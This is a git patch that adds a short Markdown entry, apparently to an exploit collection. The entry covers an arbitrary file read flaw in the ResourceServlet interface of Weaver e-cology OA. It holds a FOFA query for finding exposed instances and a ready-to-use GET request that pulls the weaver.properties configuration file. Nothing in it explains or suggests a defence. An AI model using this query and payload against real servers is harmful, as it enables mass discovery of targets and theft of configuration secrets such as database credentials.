From 1ee81601cb3da0be3f0491ce4a6dcd09b3602f35 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 14 May 2024 18:48:04 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AE-OA=E7=B3=BB?= =?UTF-8?q?=E7=BB=9FResourceServlet=E6=8E=A5=E5=8F=A3=E4=BB=BB=E6=84=8F?= =?UTF-8?q?=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 泛微-OA系统ResourceServlet接口任意文件读取漏洞.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 泛微-OA系统ResourceServlet接口任意文件读取漏洞.md diff --git a/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md b/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md new file mode 100644 index 0000000..4cf94c4 --- /dev/null +++ b/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md @@ -0,0 +1,11 @@ +## 泛微-OA系统ResourceServlet接口任意文件读取漏洞 + +## fofa +``` +app="泛微-OA(e-cology)" +``` + +## poc +``` +GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1 +```